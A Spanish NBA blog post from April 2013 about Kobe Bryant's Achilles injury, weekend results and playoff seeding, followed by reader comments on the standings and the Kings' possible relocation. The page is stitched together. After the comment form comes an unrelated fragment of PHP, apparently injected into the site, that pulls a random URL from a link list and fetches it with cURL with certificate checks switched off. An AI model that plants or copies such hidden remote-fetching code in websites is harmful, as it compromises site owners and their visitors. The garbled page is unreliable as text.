Informe del fin de semana: luchar contra los elementos

15 de April de 2013 por MagicJohnson32

kobe lesión“Mandé mis naves a luchar contra hombres, no contra los elementos”.

Aunque la lesión de Kobe Bryant relega a un segundo plano todo lo ocurrido estos últimos días, el fin de semana ha sido muy provechoso en cuanto a lo deportivo. Por ejemplo, ya sabemos con toda certeza dos de los emparejamientos de primera ronda en los Playoffs de la Conferencia Este, mientras en el Oeste los Lakers han dado un paso fundamental para atar la octava plaza y los Oklahoma City Thunder apuntan claramente como sus rivales en la eliminatoria inicial. Vamos con la crónica.

El viernes 12 de abril de 2013 pasará a la historia como el día en que Kobe Bryant se rompió el tendón de Aquiles. Muchos recordaremos también el extraordinario partido que Lakers y Warriors disputaron en el Staples Center, un encuentro que arrancó con Steph Curry desatado y finalizó con agónica victoria angelina (116-118) de la mano del sexto triple doble en la carrera de Pau Gasol. Bryant abandonó el partido a 3:08 para el final tras empatar con dos tiros libres que anotó ya con el talón roto. A partir de entonces la ventaja cambió cinco veces de manos y Carl Landry falló un tiro cómodo que pudo dar el triunfo a los Warriors. Los angelinos acabaron de confirmar anoche, aunque los elementos se alíen en su contra, que no piensan rendir armas sin su jugador franquicia y superaron también a los Spurs (86-91) en otro encuentro precioso, muy disputado, y en el que Dwight Howard y Tim Duncan protagonizaron un fenomenal duelo. El penoso día de Parker y Gasol de cara al aro lastró el tanteo de ambos equipos, y fueron cinco triples de Jamison y Meeks en el tramo final los que aseguraron el triunfo de los Lakers. Los Jazz, por su parte, hicieron el viernes los deberes con una trabajada victoria sobre los Wolves (100-107). Al Jefferson, descomunal, se fue hasta los 40 puntos, 13 rebotes y 6 asistencias. Sin embargo, los de Salt Lake City necesitan ganar los dos partidos que les restan, en Minnesota y en Memphis, y que los Lakers pierdan en su casa contra los Rockets.

Los Spurs vencieron el viernes a los Sacramento Kings (101-108) pero la derrota sufrida anoche en L.A. les deja un partido por detrás de los Thunder, que sumaron su tercer triunfo consecutivo y aseguraron el título de división al superar sin problema alguno a los Blazers (106-90). Si los Thunder parecen encaminados a verse de nuevo con los Lakers, a los Spurs le corresponderá un cruce ante Warriors o Rockets. Los texanos perdieron el viernes en su cancha contra los Grizzlies (82-78) pero se desquitaron anoche ante los Kings (100-121) con un James Harden delicioso, y de esta manera se situaron sextos por delante de Golden State. Los de Oakland necesitan sacar una victoria más que los texanos en los dos partidos que les resta a cada uno para recuperar la sexta posición y evitar a los Spurs en primera ronda.

El ‘premio’ por quedar sexto en el Oeste será una eliminatoria contra Nuggets, Clippers o Grizzlies, que siguen enzarzados entre la tercera y quinta plaza. Denver sigue siendo el favorito y se mantiene por delante, pero una nueva lesión, la de Faried anoche en la victoria sobre Portland (109-118), y la derrota del viernes en Dallas (105-108) abren la puerta a sus rivales. El sábado se vivió además un duelo entre los dos aspirantes. En un partido feo y tenso que recordó su eliminatoria de los pasados Playoffs, los Clippers acabaron imponiéndose en Memphis (91-87), un resultado que sirve a los angelinos para igualar el balance de los Grizzlies e imponerse en los enfrentamientos directos esta temporada, de modo que en caso de empate la ventaja será para los Clippers, que el viernes ya habían ganado con problemas a los Hornets (96-93).

Acabamos el repaso a lo ocurrido en el Oeste con las dos victorias de los Mavs este fin de semana, la primera ya mencionada ante Nuggets y anoche en New Orleans (107-89), y que sirvieron para dos cosas: 1- Dirk Nowitzki se convirtió en el 17º jugador que alcanza los 25.000 puntos en regular season; y 2- los texanos alcanzaron al fin el 50% de victorias y pudieron afeitarse.

heat three benchViajamos al Este, donde volvemos a tener a los Heat como el equipo con la mejor racha de victorias de la liga. Este fin de semana los campeones recuperaron al Big Three en los compromisos ante los Celtics (101-109) y los Bulls (93-105), y su eliminatoria de primera ronda ante los Bucks se presenta como un mero trámite. También se llevan otras dos victorias del fin de semana los Knicks, que han atado la segunda posición del Este y se verán con los Celtics en primera ronda. NY ganó el viernes en Cleveland (101-91) y anoche superó en el MSG a los Pacers (80-90). Melo se tuvo que retirar con molestias en el hombro y, sin ya nada en juego, descansará hasta los Playoffs.

Indiana, por contra, llega al lunes con malas sensaciones y otras dos derrotas, la cosechada ante Knicks y la del viernes frente a los Nets (117-109) en una extraordinaria actuación de Deron Williams. Los Pacers, que suman un solo partido ganado de los últimos cinco, serán terceros y posiblemente se enfrentarán a los Bulls, salvo que éstos superen a Atlanta en los dos partidos que faltan. Chicago perdió sus dos partidos del fin de semana, el primero en Toronto (88-97) y el de anoche en Miami, con lo que evitaría una segunda ronda contra los Heat. No así los Hawks, que superaron a los Bucks (104-109) y llevan camino de ser el rival de los Brooklyn Nets en primera ronda.

Con la aplastante victoria de los Celtics en cancha de Orlando Magic (120-88) cerramos el repaso a lo más importante del fin de semana. Se han jugado más partidos de los mencionados aquí, pero sin trascendencia alguna en las clasificaciones.

PREMIOS DEL FIN DE SEMANA

al jMVP: LeBron James, Dwight Howard, Vince Carter y Rudy Gay fueron de los pocos que consiguieron dos victorias este fin de semana. El primero, a su ritmo habitual (20-6-9 el viernes y 24-7-6 el domingo), el segundo jugando sus mejor minutos de la temporada (28-7 el viernes y 26-17 ayer), el tercero viviendo una segunda juventud (22-12-7 el viernes y 16-7-5 el domingo) y el cuarto con 23 puntos el viernes y 26-10 ayer noche. Pau Gasol consiguió un triple-doble el viernes en la victoria frente los Warriors. Al Jefferson sólo jugó el viernes y ganó merced a una extraordinaria actuación: 40 puntos, 13 rebotes y 6 asistencias.

Rookie: Un fin de semana más, Damian Lillard ha sido el mejor. El viernes estuvo algo flojo y se quedó en 10 puntos pero ayer dio guerra a los Nuggets con 30 puntos, 5 rebotes, 6 asistencias y 2 tapones. Will Barton está aprovechando las ausencias en los Blazers. El viernes anotó 18 puntos y ayer 17, además cogió 7 y 9 rebotes respectivamente. Otro que se han encontrado con minutos y demuestra su calidad es Brian Roberts, de los Hornets. El viernes cuajó un partidazo con 15 puntos, 6 rebotes y 11 asistencias y ayer, domingo, anotó 13 puntos, cogió 14 rebotes y repartió 6 asistencias. Buen partido anoche de Evan Fournier, que está respondiendo ante las lesiones de los Nuggets y firmó 24 puntos, 4 rebotes y 4 asistencias.

Sorpresa: Los Raptors han ganado los dos partidos disputados y lo han hecho con un buen Demar DeRozan. El viernes anotó 19 puntos pero ayer explotó con 36. Muchos minutos para Josh McRoberts en los Bobcats y grandes actuaciones. Si el viernes anotó 17 puntos y cogió 7 rebotes, el sábado se quedó muy cerca del triple doble (18-9-9). Bismack Biyombo cogió 17 rebotes el sábado. Minutos de la basura para Cole Aldrich y buena respuesta con 12 puntos, 12 rebotes y 4 tapones.

Esfuerzo en vano: James Harden mantiene el tono. Si el viernes acabó el partido frente los Grizzlies con un 30-7-6, ayer se llevó la victoria de Sacramento con un 29-4-9. Deron Williams termina la temporada regular a todo trapo. 33 puntos y 14 asistencias el viernes para vencer a los Pacers y 30 puntos y 7 asistencias anoche frente los Raptors. Andre Iguodala también ha subido sus prestaciones en ausencia de Danilo Gallinari. El viernes consiguió un 18-6-5 y ayer un 28-7-9. Marc Gasol nos dejó completísimas actuaciones el viernes (15 puntos, 12 rebotes, 5 asistencias, 3 robos y 3 tapones) y el sábado (18 puntos, 15 rebotes y 7 asistencias). Todos llegan a buen nivel a los Playoffs pero no pudieron hacerse con las dos victorias del fin de semana. Stephen Curry perdió el partido que jugó el viernes a pesar de sus 47 puntos, 6 rebotes y 9 asistencias y Monta Ellis perdió los dos partidos disputados pero el viernes dejó toda una exhibición (27-8-17 y 5 robos).

TOP 10

Comenta

18 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    En el muy improbable caso de que hubiera triple empate entre Rockets, Warriors, Lakers:

    (3) Better winning percentage against teams in own division (only if all tied teams are in the same division).

    Esto lo ganan los Lakers que son mejores contra su conferencia de lo que lo son los Warriors o los Rockets. Los dos criterios anteriores son porcentaje de victorias (si están empatados es el mismo) y si alguno es campeón de división, que tampoco lo son.

    Ahora mismo:
    Rockets: 45-35, @Suns y @Lakers
    Warriors: 45-35, vs Spurs y @Blazers
    Lakers: 44-37, vs Rockets

    En caso de que los Lakers empatasen con uno solo de ellos, se aplica el mismo criterio, así que Lakers serían 7ºs. Pero ya digo, es complicado. Los Rockets van a Phoenix, lo que no será difícil, y quizá los Warriors tengan complicado ganar en Portland en el último, pero ganarle a Spurs esta noche en back-to-back… no sé, son dos partidos que se pueden complicar, pero también pueden dar una paliza en cada uno.

      Citar

  2. Cocinitas dice:
    #2

    Solo nos queda rezar xq un Lakers-Thunder tiene pinta de que solo es alargar la agonia 1 semana más.

      Citar

  3. Jose Luis dice:
    #3

    Completamente de acuerdo, veo un 4-0 fácil, quizá 4-1 como mucho. Un 4-2 sería caer muy dignamente.

      Citar

  4. GreenPride dice:
    #4

    Visto lo que queda Lakers serán 8º, jugarán con Thunder y una victoria ya sería un éxito para ellos en esas series. Yo creo que será 4-0 y para casa. Mala suerte para todos, la lesión de Bryant nos ha privado de una primera serie más entretenida aunque creo que OKC hubiera pasado sin demasiados agobios pero habría tenido que luchar cada partido. Yo como ya he dicho incluso veía con opciones de pasar ronda a Lakers contra los Spurs pero no contra los Thunder. Pero bueno esto ya es ciencia ficción… Ahora me quedo con el Celtics-Knicks como eliminatoria más interesante con diferencia del Este y la que enfrente a 4º y 5º en el Oeste, casi seguro Clippers-Grizzlies con muchas cuentas pendientes del año pasado… y apuesto por el mismo resultado del año pasado 4-3 para Clippers (o incluso 4-2 si finalmente tienen ventaja campo)

      Citar

  5. Sancho88 dice:
    #5

    Este año Clippers van como favoritos, al contrario que el año pasado, pero ojito con estos Osotes que han perdido a Gay y Mayo, pero han ganado en sentido de juego. Yo no les doy por muertotos. Es la eliminatoria que todos queremos ver y habrá séptimo seguro. En la de los Knicks, si este año no pasan de primera ronda es para darles de hostias y no parar. Es el momento de Carmelo. Está imparable

      Citar

  6. melo15 dice:
    #6

    Mucha razón te doy Sancho, aunque creo y espero que los Knicks ganen mas o menós fácil en primera ronda.
    En las últimas semanas han estado intratables y con Melo y JR es este estado de forma veo la serie bastante favorable para los Knicks, aunque siempre te queda la duda del el teórico resurgimiento de los Celtics en Playoffs.
    PD: Si recuperan a Stat y Chandler les veo superiores a Pacers y con posibilidades de dar guerra contra Miami.

      Citar

  7. Jose Luis dice:
    #7

    Sancho, cuéntanos alma de cántaro, donde has estado metido estos meses. Te echábamos de menos. Y haznos un resumen de como has visto esta temporada a tus Kings, que al menos a ellos habrás estado atento.

    PD: y sin ánimo de ofender, desde la ignorancia… Si ahora los Kings se fuesen a Seattle… ¿te harías de los Sonics hasta que un equipo volviese a Sacramento? Los demás también podéis responder con lo que penséis. Yo en mi caso me haría de ese nuevo equipo hasta que llegase otro y cogiese el nombre de nuevo.

      Citar

  8. MagicJohnson32 dice:
    #8

    Jose Luis:
    Sancho, cuéntanos alma de cántaro, donde has estado metido estos meses. Te echábamos de menos. Y haznos un resumen de como has visto esta temporada a tus Kings, que al menos a ellos habrás estado atento.

    PD: y sin ánimo de ofender, desde la ignorancia… Si ahora los Kings se fuesen a Seattle… ¿te harías de los Sonics hasta que un equipo volviese a Sacramento? Los demás también podéis responder con lo que penséis. Yo en mi caso me haría de ese nuevo equipo hasta que llegase otro y cogiese el nombre de nuevo.

    Ni de coña. Yo odiaría a muerte al nuevo equipo.

      Citar

  9. Jose Luis dice:
    #9

    ¿Y qué te quedas, sin equipo NBA, nosecuántas temporadas siguiéndola sin la ilusión de que TU equipo haga algo? ten en cuenta que los jugadores son los mismos y tal… no se. Evidentemente si vuelve otra franquicia a “mi ciudad” pues inmediatamente vuelvo a mi equipo anterior, pero mientras…

      Citar

  10. Denise dice:
    #10

    MagicJohnson32: Ni de coña. Yo odiaría a muerte al nuevo equipo.

    +1

    Por otra parte, me parece mal que la historia de los Sonics la hereden los Thunder, y ahora que la historia de Kings la hereden los nuevos Sonics…¿no se puede tratar a los equipos de forma independiente? ¿los jugadores con camisetas retiradas de los Kings se alzaran en la de los nuevos Sonics?

    A todo esto, ha perdido Houston, si Lakers y Utah ganan en la ultima jornada, Lakers serían 7º, se enfrentarían con Spurs (ojala pase esto) y habría un empate en la octava plaza entre Houston e Utah ¿cual se clasificaría?

      Citar

  11. Ruxixón dice:
    #11

    La única forma de que entre Utah es que Houston gane a Lakers (deberían para evitar a los Thunder) y Utah gane su partido a Memphis.Houston esta en PO aunque pierda vs Lakers.No confió en que Jazz ganen a los ositos pero los Lakers deben dar lo mejor de si mismos porque no me la jugaría a que los Rockets vayan a reservarse algo.

      Citar

  12. MagicJohnson32 dice:
    #12

    Denise:A todo esto, ha perdido Houston, si Lakers y Utah ganan en la ultima jornada, Lakers serían 7º, se enfrentarían con Spurs (ojala pase esto) y habría un empate en la octava plaza entre Houston e Utah ¿cual se clasificaría?

    Sólo queda un partido y los Rockets están dos por encima de Utah. Como dice Ruxixón, la única opción de los Jazz es ganar en Memphis y que pierdan los Lakers.

    Jose Luis:
    ¿Y qué te quedas, sin equipo NBA, nosecuántas temporadas siguiéndola sin la ilusión de que TU equipo haga algo? ten en cuenta que los jugadores son los mismos y tal… no se. Evidentemente si vuelve otra franquicia a “mi ciudad” pues inmediatamente vuelvo a mi equipo anterior, pero mientras…

    Una cosa es que el equipo cambie de ciudad. No me haría la más mínima gracia pero seguiría siendo seguidor de ese equipo. Pero otra cosa es que el equipo desaparezca, como fue el caso de los Sonics en su momento y sería ahora con los Kings. La gente que era de los Sonics sigue siendo de los Sonics aunque no existan, a la espera de que Seattle recupere una franquicia NBA. ¿Qué hacen mientras tanto? Pues supongo que animar a todos los rivales de los Thunder, jeje.

      Citar

  13. rumbero dice:
    #13

    Jose Luis:
    ¿Y qué te quedas, sin equipo NBA, nosecuántas temporadas siguiéndola sin la ilusión de que TU equipo haga algo? ten en cuenta que los jugadores son los mismos y tal… no se. Evidentemente si vuelve otra franquicia a “mi ciudad” pues inmediatamente vuelvo a mi equipo anterior, pero mientras…

    Pues yo soy de los Sonics, y sin llegar al odio por los Thunder (supongo que la lejanía y el hecho de que no me hayan robado la franquicia de MI ciudad) no es mi equipo ni mucho menos. I eso que sería un buen negocio como aficionado 😀 Eso es como cuando le preguntaron a Payton si le gustaría que le retirasen la camiseta en Oklahoma y dijo que no, que nunca había jugado para ese equipo. Pues un poco igual…esos no son los Sonics.

    Así que si, en mi caso me quedé sin equipo y cada temporada vagabundeando en busca de equipillos que molen con los que simpatizar. Es otra forma más relajada de disfrutar de la NBA, que a veces uno ya tiene suficiente con los forofismos y sufrimientos de otras competeciones y deportes.

      Citar

  14. Jose Luis dice:
    #14

    Bueno, cveo que todos sois unánimes.

    Por otro lado, Utah juega a las 2 y Lakers a las 4 30, ya sabrán lo que ha hecho Utah.

    PD: cancelado (y no se aplaza, simplemente no se juega) el Pacers@Boston por los atentados de la Maratón de Boston. Ha tenido suerte la NBA porque ya no se jugaban nada ambos equipos.

      Citar

  15. Sancho88 dice:
    #15

    Ey nenes!! Bueno, primero en referencia a lo de los Kings… pues sí, ando mosqueado obviamente. De todas formas, no me haré de los Sonics, no señor. A pesar de que seguirán estos jugadores, o vendrán jugadores nuevos (supongo que harán el equipo alrededor de Cousins si finalmente se trasladan), es demasiado el palo, y de momento prefiero seguir sin equipo. Además, no es definitivo. Se cayó uno de los inversores en Sacramento (el que más pasta tenía… Burkle), pero todavía confío en que el inversor indio acabe poniendo el pastizal. De hecho, creo que este fin de semana hay reunión de dueños de la NBA con Stern a la cabeza y se va a hablar muy seriamente del proyecto Supersonics, de la continuidad o no de Sacramento… aunque me parece que se van a reunir para prorrogar al menos otro mes más. No sé, me huele a que lo de Seattle ya está hecho. Si eso ocurre, no tengo nada contra los Sonics, pero mi corazon seguirá morado pase lo que pase. Me dedicaré a amar el basket como he hecho toda mi vida y seguir la evolución de todos los equipos, porque con todos me lo paso bien y aprendo.

    Quizá, si he de decantarme por uno en especial, puede que me haga muy fan de los Wolves (si se arregla el tema Adelman-Love) y deciden postularse por fin para jugar los playoffs. Pero si no no pasa nada, seguiré vibrando con todos los equipos en general. Total, hace ni me acuerdo de años que los Kings no pasaban a postemporada. Cuando llevan casi una decada sin pasar de 30 victorias, el apagón espiritual es muy serio. No tendré equipo oficial, pero tampoco odiaré a los Sonics, que también se merecen tener una plaza dentro de la NBA. Esa es mi respuesta.

    Y sobre lo personal, pues no tengo mucho tiempo como antes, me paso mucho menos por aquí como ya veis, pero os quiero que jodéis, y seguiré colaborando siempre que pueda surmanicos. Ah, y voy a ser padre. Como salga niño lo hago amanta de la NBA sí o sí. Así que el blog va a tener nuevo rookie para el curso baloncestístico 2013-2014. Ya colgaré alguna foto o algo, jejej. Saludos nenes, se os quiere

      Citar

  16. MagicJohnson32 dice:
    #16

    Sancho88: Ah, y voy a ser padre. Como salga niño lo hago amanta de la NBA sí o sí. Así que el blog va a tener nuevo rookie para el curso baloncestístico 2013-2014. Ya colgaré alguna foto o algo, jejej. Saludos nenes, se os quiere

    Sancho, for the win!!! Yesssss!!!! Menudo jugón. Enhorabuena, tío.

    Y haz lo que puedas para encontrar huecos en tu apretada agenda y dedicarnos un ratín ¿ok?

      Citar

  17. rumbero dice:
    #17

    Sancho88:
    Ey nenes!! Bueno, primero en referencia a lo de los Kings… pues sí, ando mosqueado obviamente. De todas formas, no me haré de los Sonics, no señor. A pesar de que seguirán estos jugadores, o vendrán jugadores nuevos (supongo que harán el equipo alrededor de Cousins si finalmente se trasladan), es demasiado el palo, y de momento prefiero seguir sin equipo. Además, no es definitivo. Se cayó uno de los inversores en Sacramento (el que más pasta tenía… Burkle), pero todavía confío en que el inversor indio acabe poniendo el pastizal. De hecho, creo que este fin de semana hay reunión de dueños de la NBA con Stern a la cabeza y se va a hablar muy seriamente del proyecto Supersonics, de la continuidad o no de Sacramento… aunque me parece que se van a reunir para prorrogar al menos otro mes más. No sé, me huele a que lo de Seattle ya está hecho. Si eso ocurre, no tengo nada contra los Sonics, pero mi corazon seguirá morado pase lo que pase. Me dedicaré a amar el basket como he hecho toda mi vida y seguir la evolución de todos los equipos, porque con todos me lo paso bien y aprendo.

    Quizá, si he de decantarme por uno en especial, puede que me haga muy fan de los Wolves (si se arregla el tema Adelman-Love) y deciden postularse por fin para jugar los playoffs. Pero si no no pasa nada, seguiré vibrando con todos los equipos en general. Total, hace ni me acuerdo de años que los Kings no pasaban a postemporada. Cuando llevan casi una decada sin pasar de 30 victorias, el apagón espiritual es muy serio. No tendré equipo oficial, pero tampoco odiaré a los Sonics, que también se merecen tener una plaza dentro de la NBA. Esa es mi respuesta.

    Y sobre lo personal, pues no tengo mucho tiempo como antes, me paso mucho menos por aquí como ya veis, pero os quiero que jodéis, y seguiré colaborando siempre que pueda surmanicos. Ah, y voy a ser padre. Como salga niño lo hago amanta de la NBA sí o sí. Así que el blog va a tener nuevo rookie para el curso baloncestístico 2013-2014. Ya colgaré alguna foto o algo, jejej. Saludos nenes, se os quiere

    En un par de dias se sabrá algo. Aquí con esto de igualar oferta por parte del grupo inversor de Sacramento mientras Hansen la vuelve a subir parece que solo sirve para que los Maloof se lleven más pasta. Veremos que dice Stern de todo esto. También se ha desestimado una demanda contra la financión del pabellón de Seattle que estaba siendo un problema.

    Felicidades por la paternidad, ahi va un mini jugón!

      Citar

  18. Jose Luis dice:
    #18

    Un mini-sancho o mini-sancha? lo que nos faltaba… 😀

    Sancho for MVP! Sanchanity!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>